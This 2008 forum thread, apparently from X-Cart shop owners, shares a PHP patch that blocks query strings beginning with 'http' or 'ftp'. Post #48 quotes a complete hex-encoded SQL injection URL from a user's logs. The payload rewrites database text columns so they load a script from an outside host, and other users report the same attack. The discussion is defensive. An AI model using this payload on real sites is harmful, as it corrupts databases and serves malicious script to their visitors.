[PATCH] Blocking those pesky hackers

Scotty85 · #41 06-06-2008, 11:11 AM

I figured there had to be a way to make the part before the HTTP a wildcard of some kind.

One more reason to learn more about PHP. I dabble enough to be dangerous and can reverse-engineer it with the best of them.... just don't fully get the syntax sometimes.

intel352 · #42 06-06-2008, 11:15 AM

won't be using a wildcard, will likely do a strpos() for the '=' sign, then explode() the value if it's there, and THEN use the substr() function to check for http, ftp, etc.

I'll leave you with that to see if you can piece together the solution in actual php

Scotty85 · #43 06-06-2008, 12:57 PM

Heh.... I'm not THAT good... LOL

imexhouse · #44 06-06-2008, 08:30 PM

Here are the two patches plus the sql file for 4.0.x
I tested them on my 4.0.19 and they're working fine.

intel352 · #45 06-07-2008, 10:13 AM

@imexhouse: thanks for your contribution!

Hi Scott, this should work:

PHP Code:


		
			
##

## Added for security purposes!

##

$stop_user = false;

parse_str($_SERVER['QUERY_STRING'], $_qs);

if($_qs) {

    foreach($_qs AS $k=>$v) {

        if(substr($v, 0, 4)=='http' || substr($v, 0, 3)=='ftp') {

            if(!empty($active_modules["Stop_List"])) {

                func_add_ip_to_slist($REMOTE_ADDR, 'H');

            }

            $stop_user = true;

        }

    }

}

mltriebe · #46 06-07-2008, 10:30 AM

Quote:

Originally Posted by intel352

@imexhouse: thanks for your contribution!

Hi Scott, this should work:

PHP Code:


		
			
##
## Added for security purposes!
##
$stop_user = false;
parse_str($_SERVER['QUERY_STRING'], $_qs);
if($_qs) {
    foreach($_qs AS $k=>$v) {
        if(substr($v, 0, 4)=='http' || substr($v, 0, 3)=='ftp') {
            if(!empty($active_modules["Stop_List"])) {
                func_add_ip_to_slist($REMOTE_ADDR, 'H');
            }
            $stop_user = true;
        }
    }
}

Where does this code go, in the auth.php file?

Thanks, Mike

intel352 · #47 06-07-2008, 10:44 AM

Hi Mike, yes, it replaces *some* of the code that you would have already added, using the patch file.

So nothing gets confused in copy/paste, here's an updated patch file.

EDIT: if you want to use the patch file via X-Cart admin, you'll need to reverse the previous patch (by uploading it to Patch/Upgrade and selecting "yes" for Reverse).
Then you'll need to apply this patch.

Cheers

Scotty85 · #48 08-10-2008, 07:30 AM

I started getting these URLs in the Users Online log. Is there a way I can block these too?

HTML Code:



.../home.php?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

clik · #49 08-10-2008, 05:23 PM

I've been getting the same code in my logs (;DECLARE%20@S%20CHAR(4000); ....). I did some research: http://isc.sans.org/diary.html?storyid=4844

timbrrr · #50 08-17-2008, 08:11 AM

Noticing a lot of these too... anyone got a good solution to block these? They appear to be coming from many different IP addresses, so individual IP blocks would be impratical.
Even if they arent getting in, it would be good to have a way to deflect them before they do figure out a way in.

/?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST%20AS%20 CHAR(4000));ExEC(@S);............................. ...........................

(theres about 1200 characters total according a text editor that I pasted it into that does character count. )